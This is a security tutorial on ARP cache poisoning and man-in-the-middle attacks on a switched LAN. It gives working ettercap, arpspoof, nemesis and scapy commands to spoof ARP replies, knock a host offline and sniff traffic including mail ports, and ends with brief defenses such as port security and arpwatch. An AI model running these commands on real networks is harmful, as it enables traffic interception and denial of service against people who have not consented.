In a switched network environment, packets are sent to their destination port by MAC address. This process requires that the systems on the network maintain a table associating MAC addresses to ports. In a switched environment, packets are only sent to devices that they are meant for. Even in this switched environment, there are ways to sniff other devices' packets. One such way is to spoof your MAC address and poison the arp table. Since arp keeps no state information, the arp cache can be overwritten (unless an entry is explicitly marked as permanent).

Arp cache poisoning puts the attacker in position to intercept communications between the two computers. Computer A believes it is communicating with Computer B, but because of the poisoned arp table, the communication actually goes to the attacker's computer. The attacker can then either respond to Computer A (pretending to be Computer B), or simply forward the packets to its intended destination, but only after the packet information is captured and logged for later use by the attacker. Likewise, the response from Computer B can be captured and logged by the attacker, who has also used Arp poisoning to make Computer B think the attacker's computer is Computer A. This type of attack is known as Man in the Middle attack.

This article covers a number of tools used in arp cache poisoning attacks, including ettercap, arpspoof, nemesis, p0f, dsniff, and scapy.

Running Ettercap

For arp cache poisoning to take place, the attacker needs to be in the same network segment as the systems under attack. The first step is to obtain a list of IP addresses and their associated MAC addresses. Several tools will help you obtain this information; one example is a tool called ettercap (http://ettercap.sourceforge.net/). Ettercap is a suite for man in the middle attacks on a local LAN. It features sniffing of live connections, content filtering on the fly, and more. Ettercap supports active and passive dissection of many protocols some of several protocols. The following command:

# ettercap -T -M arp:remote //

will quickly sniff all hosts within your subnet; to view the results, type L or hit h for the help menu and you will see a list of commands.

Arp Cache DOS

To arp poison a given IP address and knock the system offline so it can't communicate with anyone, use arpspoof from the dsniff suite (http://monkey.org/~dugsong/dsniff/), a free collection of tools for network auditing and penetration testing. The dsniff suite includes tools such as dsniff, filesnarf, mailsnarf, nsgsnarf, urlsnard, and webspy, which passively monitor a network for interesting data. (Arpspoof, dnsspoof, and macof tools facilitate the interception of network traffic normally unavailable to an attacker due to layer-2 switching.)

 Arpspoof (http://arpspoof.sourceforge.net/) is much simpler than ettercap for redirecting packets:

# arpspoof -i eth0 -t <target> host

Specifying the interface is optional but required if more than one interface is present. The -t option specifies the particular host to arp poison; if the host is not specified, all hosts on the LAN will be poisoned. The host can be the default gateway, and this will keep the target from communicating beyond the local segment. Arpspoof redirects packets from a target host or all hosts on the LAN by forging ARP replies. The beauty of this program comes from the arp_send() function, which also uses libnet to spoof packets. arp_send() sends out one arp packet with source/target IP and Ethernet hardware addresses supplied by the user. Libnet is a generic networking API that provides access to several protocols.

To better understand the arp cache poisoning process, consider an alternative tool called Nemesis. If you have the IP and MAC of the intended target and host, you can use Nemesis to arp poison the target. Nemesis (http://nemesis.sourceforge.net/) is a command-line network packet crafting and injection utility. Nemesis can craft and inject ARP, DNS, ETHERNET, ICMP, IGMP, IP, OSPF, RIP, TCP, and UDP packets. By crafting your own packet using Nemesis, you can see how the arp cache poisoning works:

$ sudo nemesis arp -v -r -d eth0 -S 192.168.1.2 \
-D 192.168.1.133 -h 00:22:6E:71:04:BB -m 00:0C:29:B2:78:9E \
-H  00:22:6E:71:04:BB -M  00:0C:29:B2:78:9E

Then you create a packet to send in the other direction:

$ sudo nemesis arp -v -r -d eth0 -S 192.168.1.133 \
-D 192.168.1.2 -h  00:22:6E:71:04:BB -m 00:22:6B:7E:AD:7C \
-H  00:22:6E:71:04:BB -M  00:22:6B:7E:AD:7C

These two commands spoof ARP replies from 192.168.1.2 to 192.168.1.133 then from 192.168.1.33 to 192.168.1.2. The Nemesis arp option -S specifies the source IP address, -D specifies the destination IP address, -h specifies the sender's MAC address, -m shows the target MAC address, -H the source MAC address, and -M the destination MAC address. These two commands send bogus ARP replies to keep the ARP caches poisoned and traffic redirected.

To make sure the cache stays poisoned, replay the commands every 10 seconds with a loop.

$ while true

>do

> sudo nemesis arp -v -r -d eth0 -S 192.168.1.2 \
-D 192.168.1.133 -h 00:22:6E:71:04:BB -m 00:0C:29:B2:78:9E \
-H  00:22:6E:71:04:BB -M  00:0C:29:B2:78:9E

> sudo nemesis arp -v -r -d eth0 -S 192.168.1.133 \ 
-D 192.168.1.2 -h  00:22:6E:71:04:BB -m 00:22:6B:7E:AD:7C \
-H  00:22:6E:71:04:BB -M  00:22:6B:7E:AD:7C

> echo “Redirecting”

> sleep 10

> done

Once this is done, the targeted box will be off line and unable to communicate with the rest of the network. I made a video on my site that demonstrates this attack and is available at http://pbnetworks.net.

Sniffing the LAN

One goal of arp cache poisoning is to put the attacker in position to capture and log network information. Intruders have several tools for listening on the LAN and logging data for later analysis.

 Ettercap's bridge mode lets you you intercept packets that you can then read, sniff, or change before sending on to the victim. Bridge mode requires two interfaces that are placed in the network segment. If you set up inline with network bridge mode, you are very hard to detect.

# ettercap -Tq -i eth0 -B eth1

The -i sets the primary interface as eth0, the -B sets the second bridging interface. If you run ettercap in GTK+ user interface, select Sniff | Bridged sniffing.

Logging Data

If you would like to log all the packets in a file, you can use a number of different tools, such as p0f, which is a versatile passive OS fingerprinting and masquerade detection utility. Use p0f for evidence or information gathering on servers, firewalls, and intrusion detection systems. Ettercap can also fingerprint hosts (find the Operating System running) with the -P option; you just need to specify an open port. Once you find out what operating system is running on the target system, you can anticipate how the system will react:

# ettercap -Tq -P finger /192.168.1.121/22

To allow the p0f utility to write packets to a tcpdump snapshot, use the -w option.

p0f -w dumpfile.pcap

Dsniff is another tool in the dsniff collection described earlier in this article. Use the following command to write packets to file.

dsniff -w dumpfile.pcap

Ettercap allows dumping packet data to file with the -w option as well.

ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.130/ -w dumpfile.pcap

It is easier and less intrusive if you sniff the traffic of a specific computer, rather than trying to sniff the whole LAN segment. Otherwise you might crash ettercap.

You can then view the output in Scapy (http://www.secdev.org/projects/scapy/), if you have a graphical PostScript/PDF. Scapy is a powerful interactive packet manipulation program that has the ability to forge or decode packets of a wide number of protocols. You can use Scapy to perform tasks such as scanning, tracerouting, probing, unit tests, network discovery, tcpdump, tethereal, p0f and much more. Start by typing scapy at the terminal prompt:

$ scapy

>>> a=rdpcap(“/home/cr0wn/dumpfile.pcap”)

>>> a

>>> a[423].pdfdump(layer_shift=1)

If you want to sniff traffic on a host, give Scapy the following command:

>>> sniff(filter=”tcp and host 192.168.1.131”, count=50)

>>> a=_

>>> a.nsummary()

This command sniffs the next 50 packets traveling the network on the host 192.168.1.131 (see Figure 1).

If you use the sprintf() function, you can get even more control over what is displayed.

>>> pkts = sniff(prn=lambda x:x.sprintf(“{IP:%IP.src% → %IP.dst%\n}{Raw:%Raw.load%\n}”))

You can narrow down the ports that you sniff, as port 25 and 110 -- common ports for mail clients. Enter the following command in Scapy:

>>> a=sniff(filter=”tcp and ( port 25 or port 110 )”,

prn=lambda x: x.sprintf(%IP.src%:TCP.sport% → \
%IP.dst%:%TCP.dport% %2s,TCP.flags% : %TCP.payload%”))

The preceding command sniffs for TCP on ports 25 and 110 and uses the lambda operator, to denote anonymous functions, with the sprintf() function for more control over displayed information.

Scapy can also graph what you are sniffing on the network by producing a simple diagram of packet flow. The conversations() method will create a conversation graph, which requires graphviz and ImageMagick to work. The following command uses Scapy to sniff the wireless interface (wlan0) that is connected to a foreign network, all displayed in a graphic format.

>>> a=sniff(iface=”wlan0”, prn=lambda x: x.summary())

>>> a.conversations()

Sniffing packets with Scapy.

Conclusion

ARP Cache Poisoning allows any computer on the local area network to obtain one of the most powerful attack postures in network security called “Man in the Middle” (MITM). MITM is able to monitor, filter, modify and edit any and all network traffic moving between LAN's. This article identified some open source tools that you can use to test your networks susceptibility to an arp cache MITM attack. By making yourself familiar with these tools, you can see how secure your network really is.

A good defense against these techniques is to provide port security integrated into your switches and to run arpwatch (http://linuxcommand.org/man_pages/arpwatch8.html) to monitor address resolution protocol traffic on your network.

One way to protect network clients that engage in web browsing is to use HTTPS Everywhere (https://www.eff.org/https-everywhere) by the Electronic Frontier Foundation (EFF). HTTPS Everywhere lets a connection to supporting websites use https instead of ordinary http, which passes information in clear-text and would be read by an attacker that is sniffing the local network segment.

The Author

David J. Dodd holds a current Top Secret DoD Clearance and is available for consulting on various Information Assurance projects. A former US Marine with an Avionics background in Electronic Countermeasures Systems, David has given talks at the San Diego Regional Security Conference and SDISSA. He is a member of InfraGard and contributes to Securing Our eCity (http://securingourecity.org). He works for pbnetworks Inc. (http://pbnetworks.net), a service-disabled-veteran–owned business located in San Diego, CA. You can contact him by emailing dave@pbnetworks.net.